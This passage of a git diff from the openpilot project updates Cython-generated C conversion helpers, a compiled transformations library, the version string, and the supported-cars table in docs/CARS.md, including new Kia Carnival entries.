PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* FastTypeChecks */ + #if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ + #if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/common/transformations/transformations.so b/common/transformations/transformations.so index 47d145d7f..dd574f6f4 100755 Binary files a/common/transformations/transformations.so and b/common/transformations/transformations.so differ diff --git a/common/version.h b/common/version.h index 1a7eb653c..cb3b23253 100644 --- a/common/version.h +++ b/common/version.h @@ -1 +1 @@ -#define COMMA_VERSION "2023.07.05" +#define COMMA_VERSION "2023.07.26" diff --git a/docs/CARS.md b/docs/CARS.md index 1f33146fc..96eecd486 100644 --- a/docs/CARS.md +++ b/docs/CARS.md @@ -4,19 +4,19 @@ A supported vehicle is one that just works when you install a comma three. All supported cars provide a better experience than any stock system. Supported vehicles reference the US market unless otherwise specified. -# 253 Supported Cars +# 255 Supported Cars |Make|Model|Supported Package|ACC|No ACC accel below|No ALC below|Steering Torque|Resume from stop|Hardware Needed
 |Video| |---|---|---|:---:|:---:|:---:|:---:|:---:|:---:|:---:| |Acura|ILX 2016-19|AcuraWatch Plus|openpilot|25 mph|25 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 Honda Nidec connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Acura|RDX 2016-18|AcuraWatch Plus|openpilot|25 mph|12 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 Honda Nidec connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Acura|RDX 2019-22|All|openpilot available[1](#footnotes)|0 mph|3 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Honda Bosch A connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|A3 2014-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|A3 Sportback e-tron 2017-18|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|Q2 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|Q3 2019-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|RS3 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Audi|S3 2015-17|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|A3 2014-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|A3 Sportback e-tron 2017-18|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|Q2 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|Q3 2019-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|RS3 2018|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Audi|S3 2015-17|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Buick|LaCrosse 2017-19[4](#footnotes)|Driver Confidence Package 2|openpilot|18 mph|7 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 OBD-II connector
- 1 comma three
- 2 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Cadillac|Escalade 2017[4](#footnotes)|Driver Assist Package|openpilot|0 mph|7 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 OBD-II connector
- 1 comma three
- 2 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Cadillac|Escalade ESV 2016[4](#footnotes)|Adaptive Cruise Control (ACC) & LKAS|openpilot|0 mph|7 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 OBD-II connector
- 1 comma three
- 2 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -97,7 +97,7 @@ A supported vehicle is one that just works when you install a comma three. All s |Hyundai|Santa Fe Plug-in Hybrid 2022|All|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai L connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Hyundai|Sonata 2018-19|Smart Cruise Control (SCC)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai E connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Hyundai|Sonata 2020-23|All|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai A connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Hyundai|Sonata Hybrid 2020-22|All|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai A connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Hyundai|Sonata Hybrid 2020-23|All|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai A connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Hyundai|Tucson 2021|Smart Cruise Control (SCC)|openpilot available[1](#footnotes)|19 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai L connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Hyundai|Tucson 2022[6](#footnotes)|Smart Cruise Control (SCC)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai N connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Hyundai|Tucson 2023[6](#footnotes)|All|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai N connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -106,6 +106,8 @@ A supported vehicle is one that just works when you install a comma three. All s |Hyundai|Veloster 2019-20|Smart Cruise Control (SCC)|Stock|5 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai E connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Jeep|Grand Cherokee 2016-18|Adaptive Cruise Control (ACC)|Stock|0 mph|9 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 FCA connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Jeep|Grand Cherokee 2019-21|Adaptive Cruise Control (ACC)|Stock|0 mph|39 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 FCA connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Kia|Carnival 2023[6](#footnotes)|Smart Cruise Control (SCC)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai A connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Kia|Carnival (China only) 2023[6](#footnotes)|Smart Cruise Control (SCC)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai K connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Kia|Ceed 2019|Smart Cruise Control (SCC)|Stock|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai E connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Kia|EV6 (Southeast Asia only) 2022-23[6](#footnotes)|All|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai P connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Kia|EV6 (with HDA II) 2022-23[6](#footnotes)|Highway Driving Assist II|openpilot available[1](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 Hyundai P connector
- 1 RJ45 cable (7 ft)
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| @@ -151,11 +153,11 @@ A supported vehicle is one that just works when you install a comma three. All s |Lexus|RX 2020-22|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Lexus|RX Hybrid 2016|Lexus Safety System+|openpilot available[2](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| |Lexus|RX Hybrid 2017-19|All|openpilot available[2](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Lexus|RX Hybrid 2020-21|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Lexus|UX Hybrid 2019-22|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Lexus|RX Hybrid 2020-22|All|openpilot|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 RJ45 cable (7 ft)
- 1 Toyota connector
- 1 comma power v2
- 1 comma three
- 1 harness box
- 1 mount
